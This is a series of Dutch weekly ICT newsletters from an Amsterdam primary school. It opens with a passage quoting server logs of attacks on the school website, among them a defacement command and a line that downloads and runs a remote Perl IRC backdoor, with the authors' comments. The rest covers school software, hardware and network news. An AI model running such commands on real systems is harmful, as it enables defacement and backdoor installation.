200.162.208.31 - - [03/Dec/2004:16:01:49 +0100] echo AKI0x01;cd /home/httpd/htdocs;echo Simiens Crew, Enquanto houver fome e guerra simiens existira > index.php;cat index.php;echo ALI0x02;
Deze kenden we al (deze defacement zette ons op het spoor! We mogen ze wel dankbaar zijn!)
91.230.162.200.in-addr.arpa domain name pointer 200.162.230.91.user.ajato.com.br.


=======================================================
Vanaf vrijdagavond 3 december was er geen gat meer; alle volgende pogingen zijn dus mislukt. Desondanks heel leerzaam...
=======================================================


200.203.110.192 - - [04/Dec/2004:04:04:51 +0100] cd /tmp;wget http://paginas.terra.com.br/informatica/fdl/bot.txt;perl bot.txt
Uitleg:
Hier wordt een Perl-programma bot.txt opgehaald. Da's een file van zo'n 20 kB met daarin een backdoor / daemon die iets met IRC doet. Ik heb het niet in detail bekeken, maar eng is het wel.
192.110.203.200.in-addr.arpa domain name pointer 200-203-110-192.smace7006.dsl.brasiltelecom.net.br.


201.8.130.119 - - [04/Dec/2004:08:33:06 +0100] echo ___INICIO___;uname -a;echo ___FIM___;
wordt nog een keer herhaald ook. No joy.
119.130.8.201.in-addr.arpa domain name pointer 201008130119.user.veloxzone.com.br.


200.225.194.49 - - [04/Dec/2004:22:25:32 +0100] id echo ___INICIO___;id;echo ___FIM___; id
49.194.225.200.in-addr.arpa domain name pointer 225-194-049.ctbctelecom.com.br.


200.163.142.154 - - [06/Dec/2004:03:37:34 +0100] echo ___INICIO___;id;echo ___FIM___;
154.142.163.200.in-addr.arpa domain name pointer 200-163-142-154.erece201.dial.brasiltelecom.net.br.


200.206.201.27 - - [06/Dec/2004:16:37:41 +0100] id
27.201.206.200.in-addr.arpa domain name pointer 200-206-201-27.dsl.telesp.net.br.


200.232.209.189 - - [06/Dec/2004:22:55:43 +0100] id
189.209.232.200.in-addr.arpa domain name pointer 200-232-209-189.dsl.telesp.net.br.


200.162.230.91 - - [07/Dec/2004:16:46:59 +0100] id
31.208.162.200.in-addr.arpa domain name pointer 200-162-208-31.user.ajato.com.br.


24.239.158.30 - - [08/Dec/2004:02:48:36 +0100] id
(herhaalt een stuk of 10 keer)
30.158.239.24.in-addr.arpa domain name pointer user-0cev7gu.cable.mindspring.com.


200.162.230.91 - - [08/Dec/2004:16:45:34 +0100] id
91.230.162.200.in-addr.arpa domain name pointer 200.162.230.91.user.ajato.com.br.


200.164.173.94 - - [08/Dec/2004:21:39:07 +0100] echo ___INICIO___;uname -a;id;pwd;echo ___FIM___;
94.173.164.200.in-addr.arpa domain name pointer 200164173094.user.veloxzone.com.br.


64.229.20.199 - - [09/Dec/2004:07:28:52 +0100] id; id
199.20.229.64.in-addr.arpa domain name pointer HSE-London-ppp196390.sympatico.ca.


Tot zover dit lange verhaal.

Onze dank gaat uit naar Peter en Fred die snel in actie zijn gekomen.

Groet en goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-12-17 w51

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 51 - 2004 (17 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Leesladder

Deze week zijn we met drie leerkrachten naar de onderwijsbegeleidingsdienst om uitleg te krijgen over het programma “leesladder”. Dit is een remediërend leesprogramma. We kwamen met de vraag: hoe zet je het programma in? We kregen uitleg van een taal specialist, niet van een ict-er. Deze specialist gebruikt het programma zelf bij kinderen met leesproblemen. Het is erg belangrijk om eerst een kind te onderzoeken op waar de problemen zitten. Bijvoorbeeld als het leerlingen zijn die op latere leeftijd op school komen. Het programma is adaptief: het toetst een leerling en past de oefeningen automatisch aan aan het niveau. Maar je blijft toch met die 4 verschillende cd-roms zitten. Elke cd-rom heeft andere leesproblemen. In groep 3 en 4 zul je bijna altijd met cd-rom 1 beginnen. Kortom: het was allemaal heel zinvol en verhelderend. En het resultaat is nu: de handleiding van het programma staat waar hij hoort: op het bureau van de remedial teacher!!

Voor het geval er storingen zijn

Deze week hebben we op papier gezet hoe te handelen in geval van computerstoringen. Als het concept is goedgekeurd door het team zullen we het publiceren, zodat andere lezers er ook gebruik van kunnen maken.

Computers gedocumenteerd

Doordat de SWITCH toch kapot bleek te zijn ontstond de noodzaak precies te weten welke computer op welke plek in de school staat. Daar hebben we een tabel van gemaakt. Het was een hele klus, maar zal ons in de toekomst veel werk besparen.

CHEMIE MET S@S

Van Fritz ontvingen we een link van zijn chemie website http://www.gym-hartberg.ac.at/chemie/index.php Zeer interessant om te zien wat leraren chemie op een Duits Gymnasium met S@S doen.

Nu we toch in Duitsland zijn (waar S@S wijdverbreid is), hier een link van een prachtige site. Wat een mooi template! http://www.wilhelm-remy-gymnasium.de/ Dit prachtige template kun je gratis downloaden van onze site waar veel nieuwe templates op staan: http://siteatschool.sourceforge.net Zie onder 'Templates'.

Nieuwsbrief

Schrijf je in voor de nieuwsbrief van S@S. Dan wordt je op de hoogte gehouden van bugfixes, updates en dergelijke. http://siteatschool.sourceforge.net/index.php?section=12&page=42

ServerOpSchool

Geen nieuws, maar in de wandelgangen wordt gefluisterd dat er meerdere scholen aan zitten te komen.

Weer 30 computers erbij

Van onze bevriende gemeenteljke dienst ontvingen we nog 25 computers die identiek zijn aan onze P2 400 Dell. Daarmee zijn we zéér geholpen! Hartelijk dank Peter! Zie ook het volgende stukje.

Geluidskaarten

Een bevriende school in het stadsdeel dankte 20 oude computers af waarin precies de geluidskaart zit die in de Dell hoort (zie boven). We hebben ze voor een goede prijs overgenomen omdat we met die geluidskaarten ons aantal _identieke_ computers op 60 brengen. En identieke computers zijn belangrijk, omdat je dan met images kunt werken die je met SABRINE (Semi Automatic Backup and Restore In a Network Environment, een van de zeer krachtige gereedschappen in ServerOpSchool) makkelijk kunt maken en terugzetten. Zo hebben we genoeg leerlingcomputers.

Switch

Helaas is het niet goed afgelopen met onze 32 poorts switch van het merk Level-One. Bij goede inspectie bleek hij door oververhitting te zijn overleden. De oververhitting is gekomen omdat de ventilatioren door vervuiling of door goedkoopte niet meer op volle snelheid liepen. Balen en wijze les: Inspecteer regelmatig de ventilatoren. We hebben voor onze andere Level-One switch nieuwe ventilatoren besteld. In plaats van de goedkope ventilatoren met glijlagers hebben we ventilatoren gekocht met kogellagers. Kosten 11 eur per stuk. Er zitten 2 in de switch.

Goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-12-23 w52

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 52 - 2004 (23 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ho ho ho

Leerlingmappen

Eindelijk zijn alle mappen van de leerlingen bijgewerkt met werk dat ze het vorig schooljaar hebben gemaakt. De bestanden van de oude fileserver waren nog steeds niet allemaal overgezet.

Malmberg Letterpret

Nog even op de valreep van dit schooljaar werden we “verblijd” met een rekening van Malmberg voor het gebruik van Letterpret in 2005. We gaan die rekening niet betalen.

Overdracht SOS

Deze week hebben we de puntjes op de i gezet. Het netwerk beheer is nu helemaal over gegaan naar SoS. Dat betekent, dat we voor alle netwerk problemen naar Peter kunnen. Dirk blijft als handje van Peter en tovenaarsleerling beschikbaar.

Kijkje in de Joop Westerweel

Deze week zijn we gaan kijken in de Joop Westerweel (andere basisschool in ons stadsdeel). Hun schoolgebouw is pas nieuw en ze werken er ook met SOS. We gingen kijken naar hun computerstoelen. We hebben nog steeds niet besloten welke stoelen/krukken we zullen aanschaffen. Soms zijn we zo besluiteloos!!! Dirk: “Karin is dat!”

CC of BCC in een email

Als je een email verstuurt naar meerdere mensen is het niet netjes om adressen aan vreemden bekend te maken of emailadressen te verspreiden. Als je een email verstuurt aan mensen die elkaar goed kennen en die van elkaar moeten weten dat ze de email ook hebben ontvangen, dan stuur je CC (carbon copy). Maar als de emailadressen niet verspreid en bekend gemaakt horen te worden dan stuur je BCC (blind carbon copy). Dan zie je niet aan wie de mail nog meer is verstuurd. Dus deze nieuwsbrief sturen we altijd BCC. Vandaag ontvingen we een brief met heel een vertrouwelijke bijlage. Die email was CC verstuurd aan wel 75 scholen in Amsterdam. Heel gênant.

Nieuwe Switch

Onze nieuwe switch is binnen: een Netgear, 48 poorts. 10/100 met twee Gigabit poorten. Dat is handig omdat je nu met 1 gigabit netwerkkaart in de server een gigabit verbinding hebt tussen switch en server. Pas tussen de switch en de client is de verbinding 100 MB. Als er veel netwerkverkeer is, zul je het verschil in snelheid merken.

Desktops vastgezet.

De desktops van de groepen zijn nu aangepast en vastgezet. Als een leerling de desktop wijzigt, worden de wijzigingen ongedaan gemaakt.

WE LOVE SABRINE!

Eindelijk hebben wij nu ook Sabrine (Semi Automatic Backup and Restore In a Network Environment). Wow! Nu kunnen zelfs leerkrachten in een handomdraai images terugzetten en virusscans op de computers in de klas. Het werkt als een zonnetje. En... Het gaat nog beter werken. Peter is nog aan het ontwikkelen. Als Sabrine af is kan zij het volgende:
- Op vooraf in te stellen tijden wordt bij het opstarten van een computer automatisch een nieuw image teruggezet Hiermee heb je alle mogelijke vervelende zaken ondervangen. Op een school waar veel aan computers wordt gerotzooid kan bijvoorbeeld 1 x per dag een schoon image neergezet worden, of zelfs na iedere opstart.
Op een 'normale' school kun je dat bijvoorbeeld 1 x per week of maand doen. - Nu moet je na het terugzetten van het image nog de standaardprinter instellen. In de verbeterde versie hoef je niets mer te doen en heb je na het terugzettten van een image de standaardprinter goed stqan. Wat een feest! Sabrine haalt je ontzettend veel werk uit handen en spaart ook nog eens veel geld omdat de virusscanner waarmee Sabrine werkt gratis is en altijd up to date omdat de server iedere nacht niuewe virusdefinities ophaalt. Verder kan Sabrine nog een paar kunstjes die we graag eens een keer aan belangstellende ICT coordinatoren en systeembeheerders uitleggen.

Dit was de laatste BIC van 2004.
We wensen u allen een zalich uiteinde en een digirijk 2005
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-01-14 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 2 - 2005 (14 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Software bestelling

Via het internet hebben we deze week het programma Maatwerk besteld. Dat is een remediërend rekensoftwareprogramma. Het is van de firma Malmberg........we zijn benieuwd! We staan al met opgerolde mouwen klaar voor de installatie. In week 4 wordt het geleverd.

Monique gaat weg.

We ontvingen het bericht dat onze begeleidster van het ABC een andere baan heeft per 1 februari. Monique heeft ons jarenlang ondersteund en geïnspireerd om onze ICT leerlijn tot stand te brengen. Het is heel jammer dat er een einde komt aan onze goede samenwerking. Monique bedankt!
In de laatste week van januari zal de overdracht plaatsvinden met een andere medewerker van het ABC.

Opruimen van overtollige apparatuur.

We hebben in de school zoveel mogelijk dezelfde computers, omdat we dan met images kunnen werken, als de computers aangepast moeten worden. We hebben een aantal computers waarop het programma Veilig Leren Lezen geïnstalleerd is, een aantal computers voor de administratie en verder alleen maar identieke DELL computers (pentium3). Na een flinke opruimactie hebben we zicht gekregen op wat we niet meer nodig hebben. Binnenkort publiceren we een lijstje van wat er verkocht gaat worden. De opbrengst gaat in de ICT kas.

TECHNISCH

QRes

Deze mededeling hebben we in nl.onderwijs.open-source gezet en, enigszins aangepast in nl.onderwijs.nieuwe-media.
QRes is een windows tooltje dat automatisch de resolutie kan veranderen bij de start van een programma en, bij afsluiten van dat programma, de resolutie weer terugzet.
Een bijzonder handig tooltje dat programma's als 'Veilig Leren Lezen' en 'Clowns' weer goed bruikbaar maakt in de klas.
Het programma was al als freeware gratis beschikbaar. Na overleg met de Rosa Boekdrukkerschool heeft Berend Engelbrecht van Software Cave http://www.softwarecave.nl/ besloten het programma OSS te maken onder de BSD licentie. Bedankt Berend!

ServerOpSchool

Eindelijk zijn de 4 scholen naar wens opgeleverd. Dat heeft langer geduurd dan gedacht. Nadeel: tijdverlies. Voordeel: veel geleerd. Fouten die we bij de volgende installaties niet meer zullen maken.
Peter en Dirk beleven veel gemak van SABRINE (Semi Automatic Backup and Restore in a Network Environment). We moesten de images terugzetten van zo'n 40 computers. Arbeidstijd: 0,5 uur.
Aard van de arbeid: computer aanzetten en doorlopen naar de volgende computer. Dit 40 x.
Het meeste werk is het lopen door de school.

Site@School

Door al dat gewerk is S@S deze weken een beetje in de verdrukking geraakt. Maar, de ontwikkeling heeft niet stilgestaan.
De email module is groots verbeterd en ook de formulieren module heeft een lang gewenst feature toegevoegd gekregen.

groeten en een prettig weekend,

Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-01-21 w03

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 3 - 2005 (21 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT leerlijn

Deze week hebben we een gesprek gehad met een docent en een student van de EFA (Educatieve Faculteit Amsterdam) die ons gaan helpen met het opzetten van een website waarin onze oefeningen voor de ICT leerlijn gratis te downloaden en aan te vullen zullen zijn. De oefeningen zullen worden aangepast en vertaald naar het tekstverwerkingsprogramma “Open Office”. Er wordt nog hulp gezocht van een taal- en een pabo-student.

Open Office

Dat is de naam van 'het' gratis tekstverwerkingspakket dat hetzelfde doet als Microsof Office.
De gemeente Haarlem heeft een ICT afdeling en heeft Open Office onderzocht op bruikbaarheid.
Een citaat uit hun rapport:

“In eerste instantie zal gekozen worden voor het implementeren van Open Office.org naast Microsoft Office. Het is geen enkel probleem naast elkaar op de werkplek ter beschikking te stellen. Dit vergemakkelijkt de overgang voor de gebruikers. [...]
Het importeren van Microsoft producten in Open Office.org is geen enkel probleem, maar het omgekeerde ook niet. Producten van Open Office.org naar Microsoft geeft ook geen problemen.en zeker niet wanneer voor de standaardopslag wordt gekozen bij Open Office.org, t.w als Microsoft 97/2000/XP.
Alle producten kunnen dan zonder meer worden geïmporteerd door Microsoft Office programma's als Word, Excel en Powerpoint.”.

Tot zover het citaat. We overwegen om over te stappen. Het scheelt een hoop geld. En ook: zo worden we steeds onafhankelijker van de Wurgcontracten!

Educat-B

We ontvingen een brief over de “kwaliteitsimpuls onderwijsmediatheken”. Als je of een mediatheekprogramma aanschaft, of je contract voor 3 jaar verlengt, ontvangt de school boeken ter waarde van € 125.- voor maar €50.-. We hebben natuurlijk meteen een formulier ingestuurd. Zie voor meer informatie: www.schoolmediatheek.nl

Nieuwe software aanschaffen?

We hebben nog twee programma’s met beveiligingssleutels (WIG en Veilig Leren Lezen) Die sleutels zijn onhandig bij het overzetten van images. Dus zitten we te denken om ze te vervangen. Maar past de nieuwe software van Veilig Leren Lezen wel bij de 1e maan-roos-vis versie die wij nog steeds gebruiken en die nog lang niet afgeschreven is? Het oude computerprogramma kan eigenlijk ook erg weinig. Het past helemaal niet meer bij onze criteria die we nu aan software stellen. Het programma wordt door ons gebruikt sinds maart 1996!
De oude versie van WIG gebruiken we alleen maar omdat we het nog hebben en er bij onze huidige rekenmethode (Wis en Reken) alleen nog maar software is voor groep 4.

KPN aansluiting

We hebben gebruik gemaakt voor het KPN aanbod voor gratis adsl. Voor eind januari moeten we de rekening opsturen voor de aansluiting van het modem op onze telefooncentrale. Tot 31 januari vergoedt de KPN de kosten. Opschieten, dus!
Wat we gaan doen met die aansluiting, dat zien we later wel. Voorlopig doet onze kabelverbinding voor 78 euro in de maand (internet easy) het nog prima.

Nieuwe images

De tweede verdieping heeft nieuwe images op alle computers. We hoefden ze alleen maar langs te lopen en te starten. Dankzij Server@School en Sabrine!
Als nu iemand vogeltjes op het bureaublad zet, staat er in no-time een nieuw schoon scherm. Kan zelfs automatisch; elke dag.

groeten en een prettig weekend!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-01-28 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 4 - 2005 (28 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT begeleiding

Deze week hebben we afscheid genomen van Monique, die ons jaren heeft begeleid met ons ICT beleid. Ze heeft vele cursussen gegeven en evaluatiedagen verzorgd. Nu gaat ze naar het zuiden van het land, waar ze o.a. voor 3VO gaat werken. Nogmaals bedankt, Monique!

Email project groep 4.

Het gaat door: we gaan een emailproject doen met een basisschool in Friesland. www.deopslach.nl. We zullen dus een knuffeldier met TPG-post op reis sturen.

Groep5

Van de week is groep 5 begonnen aan het maken van werkstukjes. Verder zijn ze in die groep hard bezig om de tafels te oefenen op de computer. Ook allerlei puzzels van www.rekenweb.nl vallen bij de leerlingen erg in de smaak.

Beugeltje

Een van onze administratieve computers heeft een beugeltje onder het ladenblok gemonteerd gekregen. Onze huissmid Domien heeft weer wat leuks gemaakt (na de computertafels) zie de foto: http://www.rosaboekdrukker.net/index.php?page=615&navpath=,1320,1402&contents =1403,1404,1405,4014&section=15&ID=4014&gallerypage=1

Maatwerk

Volgens de leverancier hadden we deze week het programma Maatwerk moeten ontvangen. Dat is niet gebeurd. Deze keer bestelden we het programma niet rechtstreeks bij Malmberg, maar bij Koks-Gesto. We hopen, dat we nu geen nieuw Malmberg-probleem hebben aangeboord!!!!

TECHNIEK

S@S

De tijd gaat snel en de nieuwe release datum is alweer aan de horizon zichtbaar. Deze week werkte Fred hard aan een vernieuwde email module. Het is een prachtige module geworden, helemaal passend in een school met afdelingen die ieder apart per mail benaderd kunnen worden.
We zijn met de eerste beta testen begonnen voor versie 2.3. Meld je in het Forum http://rosaboekdrukker.net/phpBB2 als je mee wilt testen.

SERVER@SCHOOL BESCHIKBAAR!

Afgelopen vrijdag vierden we een heuglijk feit. De vier directeuren van de vier scholen 'van het eerste uur', de initiatiefnemers van Server@School, kwamen in vergadering bijeen en besloten dat de software vanaf nu beschikbaar is.
Tevens richten de vier scholen een gebruikersgroep op die zorgt voor de continuïteit en doorontwikkeling van Server@School. Scholen die Server@School willen gebruiken kunnen de software bekomen via de gebruikersgroep en worden daar ook meteen lid van. Zo hebben ze een stem in de doorontwikkeling van hun eigen software.
Direct daarop togen Peter en Dirk aan het werk.
Maandagavond zaten we op een school in het Gooi om SoS te 'verkopen' en woensdag kwam een school op de Rosa Boekdrukker kijken naar hoe SoS draait en wat het allemaal in zich heeft. De demonstratie maakte diepe indruk.
Als derde deze week besloot een ICT'er van een school in Noord Nederland dat hij SoS wil: Aanmerkelijk voordeliger dan de andere aanbieders. En, vlak voor sluitingstijd van de BIC meldde zich een vierde school!
Hoort en zegt het voort! Server@School is beschikbaar voor basisscholen. Zie verder http://serveropschool.nl

groeten en een goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-02-04 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 5 - 2005 (4 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Storingsformulier

Om binnen de school storingen/klachten/verzoeken snel te kunnen doorgeven, is er een storingsformulier ontwikkeld op de site van de Rosa Boekdrukker. Dit ter vervanging van het computerschrift.
Het storingsformulier werkt als volgt:
In het logo van de school staan zes rechthoekjes. De linker, de roze, is voor het storingsformulier. Klik erop en vul het in. Dan wordt er een email verstuurd naar de beheerders.
We zijn benieuwd!
ps. Mede-lezers: maak er aub geen misbruik van. Dit formulier is gemaakt met de “formsbuilder” die in S@S staat.

Malmberg - Maatwerk

We hadden weer een probleem. Nu was het formulier waarop je moet aangeven hoeveel leerlingen de school heeft niet door Malmberg ontvangen. Dus moest er een kopie worden opgestuurd. Per abuis hadden we 100 leerlingen te weinig opgegeven. Daarover werden we onmiddellijk gebeld. Zo schiet het niet erg op om het programma aan te schaffen. Slecht voorteken?

ICT leerlijn

Volgende week hebben we een gesprek met onze nieuwe hoofd-begeleider van de onderwijs begeleidingsdienst. Monique wordt opgevolgd door Jan.
Het email project met onze groep 4 en groep 4 van De Opslach in Franeker begint duidelijke vorm aan te nemen. 4 maart zal de knuffel uit Friesland naar Amsterdam worden gebracht, onze knuffel gaat dan helemaal naar het noorden.

STICHTING KATHOLIEK BASISONDERWIJS AMSTERDAM KIEST VOOR SERVER@SCHOOL

Klein feestje ten burele van SoS. Deze week hadden Peter en Dirk een bespreking met de St. KBA. Met als resultaat dat we op 'De Ark' in Amstelveen SoS gaan installeren. Mogelijk volgen daarna nog een paar andere scholen van de St. KBA.
We zijn zeer content met deze club waarin een team van ICT'ers zit dat van wanten weet.
We zijn van plan een demo van SoS te organiseren op woensdagmiddag 23 februari a.s. op de OBSRB of de Joop Westerweelschool, beiden in Amsterdam West.
Belangstelling? Meld je aan en zeg met hoeveel personen je komt.

Site@School

Fred is aan de chat begonnen. Dirk test. We hebben nog nooit zoveel gechat en zo weinig gezegd:
>Fred <enters the room>
>Dirk <enters the room>
>Fred: asdfasdfasdf
>Fred: asdfasdfasdf
>Dirk: er staat twee keer asdfasdf
>Fred: Hm, bij mij staat twee keer wat jij zegt
>Dirk: Nu staat er maar een keer wat jij zegt.
>Fred: bij mij nu ook.
Jullie begrijpen dat na deze inspirerende conversatie voor twee heren Fred weer opgeruimd aan het werk gaat tot de volgende chat sessie.
Maar, hij wordt wel mooi!

Groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-02-11 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 6 - 2005 (11 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Onderwijsbegeleidingsdienst

We hebben afspraken gemaakt hoe de begeleiding van onze ICT leerlijn de rest van het schooljaar moet gaan.

Storingsformulier

We hebben slechts één melding binnengekregen. Drempelvrees, of gaat alles goed?

Maatwerk Malmberg

Vanmiddag kwam het programma binnen. Na onze krokusvakantie zullen we de dozen openen.

UITNODIGING VOOR DEMONSTRATIE SERVER@SCHOOL

We willen ons zelf ontwikkeld serversysteem voor basisscholen Server@School aan belangstellenden demonstreren. Veel info vind je op http://serveropschool.nl , maar 'zien is geloven'.
Op Woensdagmiddag 23 februari om 14.00 uur geven we de demo in de Openbare Basisschool Joop Westerweel.
Adres: Balboaplein 44
Postcode: 1057 VS Amsterdam
Telefoon: 020-6125539
Fax: 020-6163296
Wil je mailen naar info@serveropschool.nl als je komt.
Tot Woensdag!

Dit was korte BIC.

Prettige vakantie en/of een goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-02-24 w08

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 6 - 2005 (11 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

### bijdrage: Dirk Schouten : schoutdi@knoware.nl ###
Hi Karin,
Even kijken of het wekrt.
hoeveel is 43254636523456573476 gedeeld door 132453214,2134
groet
dirk
### bijdrage: Dirk Schouten :schoutdi@knoware.nl ###

### bijdrage: Karin Abma : k.abma@quicknet.nl ###
Deze week is de agenda van Het Klokhuis weer bijgewerkt op de site. Je kunt zien welke onderwerpen aan de orde komen tot 4 november. http://www.rosaboekdrukker.net/index.php?section=4
### bijdrage: Karin Abma : k.abma@quicknet.nl ###

Noot

Bovenstaande tekst geeft een voorbeeld van twee ingezonden mededelingen.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-02-25 w08

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 8 - 2005 (25 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LEERLIJN

Afspraken Kleuterbouw - Letterpret

Met Suzanne, een taalspecialist van onze begeleidingsdienst hadden we een bijeenkomst over het goed inzetten van het programma Letterpret in de kleuterbouw.
Het programma biedt heel veel mogelijkheden op het gebied van de leesvoorwaarden. We hebben afgesproken om op 29 maart met de leerkrachten van de onderbouw het programma in het kader van het taalaanbod eens uitgebreid door te lichten. Want de mogelijkheden van het programma moeten we nog beter doorgronden.
Bij de voorbereiding van het gesprek zagen we op de site van Malmberg dit programma helemaal niet meer vermeld staan. Wel: “De Leessleutel-Letterpret”. Na navraag bleek dat dat een voorloper is van het leesprogramma voor groep 3: “De Leessleutel”.  ”Letterpret” is te gebruiken onafhankelijk van een leesmethode. Maar het is wel vreemd, dat er helemaal niet over gerept wordt. Zie ook: http://www.malmberg.nl/bao/computer/index.shtml
Voordat de bijeenkomst zal plaatsvinden gaan we nog even kijken of het technisch allemaal werkt: een groepje leerlingen tegelijk eraan laten werken.

Afspraak groep 3 t/m 5

Op dinsdag 5 april gaan we de leerlijn nog eens doornemen: wat lukt er wel, wat lukt er niet.
In groep 4 starten we volgende week met het berenproject. Groep 4a van basisschool De Opslach in Franeker is er klaar voor.

Groep 8

In groep 8 gaan ze naar de tentoonstelling over Marokko in de Nieuwe Kerk in Amsterdam. Er is een website met weblessen ter voorbereiding van het bezoek. Wel even een lastige website: we moesten heel snel een shockwave programma op de computers installeren, anders kunnen de leerlingen niet aan de slag. Mensen: bekijk de website. Heel erg de moeite waard. www.nieuwekerk.nl Kijk bij school&kind en dan bij basisschool.

Aardrijkskunde Nieuwsbrief

Er is weer een nieuwe aardrijkskunde nieuwsbrief uit: http://rosaboekdrukker.net/index.php?section=10&page=718
Er staan allerlei leuke links in de nieuwsbrief. Klik eens op de link naar de BEELDBANK!!!!! (aanmelden nieuwsbrief beeldbank: http://schooltv.dmdelivery.omroep.nl/plugin.php?pName=subscribe_form&midrid=eNTpLtjUyAgAC3QEF )

Maatwerk

Vandaag zijn er drie programma’s van Maatwerk op onze server en clients geïnstalleerd. Maandag worden de clients ge-update met Sabrine.

TECHNISCH!!!!

S@S en SoS

We hadden een vergadering over de nieuwe release. Vanaf heden is er een 'feature freeze', Versie 2.3 beta is beschikbaar voor testers via het Forum. De vertalers krijgen van het weekend bericht. En zo draait de machine.
31 mei a.s. komt versie 2.3 uit. Er zit een chatmodule in; erg mooi. Daarnaast vele kleine en grote verbeteringen. Paginabeheer is nu ook per sectie instelbaar. Een enorme vondst.
Verder besloten we dat we standaarden gaan gebruiken voor de gebruiksaanwijzingen en voor de code. Het omwerken zal tijd en inspanning kosten. Gelukkig is er geld voor.

ServerOpSchool

Peter en Dirk gaven een demonstratie aan de Stichting ICT op School en Linux Magazine. Ook aanwezig was een ICT'er uit Middelburg. Ook het hoofd Onderwijs van de Baarsjes en de communicatie adviseur waren aanwezig. We kregen de indruk dat de heren goed begrepen wat het concept inhoudt en dat e.e.a. qua kosten een koopje is.

Switch

De nieuwe switch is binnen. A.s. Woensdagmiddag zal hij geïnstalleerd worden. De switch die dan vrijkomt zal schoongemaakt en gereviseerd worden (nieuwe ventilatoren).. Inzetbaar als bakcup of reserve.

groeten en prettig weekeinde!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-03-04 w09

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 9 - 2005 (4 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Letterpret

In verband met scholing van de onderbouwleerkrachten is deze week door 6 leerlingen van groep 3 getest of het programma goed bleef werken in het netwerk als er 6 kinderen tegelijk met het programma bezig waren. Dirk deed ook nog even mee (zie foto) http://www.rosaboekdrukker.net/index.php?page=615&navpath=,472,4121&contents=4122,4123,4124&section=15&ID=4124&gallerypage=1
Het ging prima, maar alleen zijn er nu problemen in het leerkrachtendeel. Er kunnen bestanden niet gevonden worden. We zijn dus nog niet klaar met Malmberg.

inDruk van Kennisnet

Kennisnet inDruk is een gratis kwartaalblad voor docenten in het primair onderwijs, voortgezet onderwijs en het beroepsonderwijs en de volwasseneneducatie. In het blad staat de praktische gebruikswaarde van Kennisnet centraal.
Het wordt aan scholen toegestuurd per post en er staan vaak leuke tips in. Men kan het ook privé ontvangen: http://corporate.kennisnet.nl/publicaties/indruk/aanvraagformulier

Groep 3

Eindelijk zijn ze in groep 3 nu ook aan de gang met de voorgeschreven opdrachten. Er zijn weer wat kinderen die hun talenten laten zien met de computer. De kinderen snappen heel snel wat het betekent als ze hun werk moeten opslaan. Het is te merken, dat jonge kinderen al veel “muisvaardiger” zijn dan een paar jaar geleden.

Berenproject

In groep 4 zijn de beren uitgewisseld met de school in Friesland. De beer van de Rosa Boekdrukker heet Snuffeltje en de logeerbeer heet Joey-Fleur.
We hebben nu nog erge ruzie met de squirrelmail die wij hier gebruiken. Heel erge ruzie!!

BEZOEK BASISSCHOOL DE OPSLACH UIT FRANEKER

De bezoekers (zie reden onder) waren zeer getroffen door de prettige sfeer in de school. Vanuit het hoge noorden heb je zo je denkbeelden bij een zwarte school in Amsterdam-West en men trof iets totaal anders aan. Rustig, ordelijk, leuke manier van omgaan met elkaar, goede sturing.
Kortom, ook in dat opzicht een positieve ervaring.

TECHNIEK

BEZOEK BASISSCHOOL DE OPSLACH

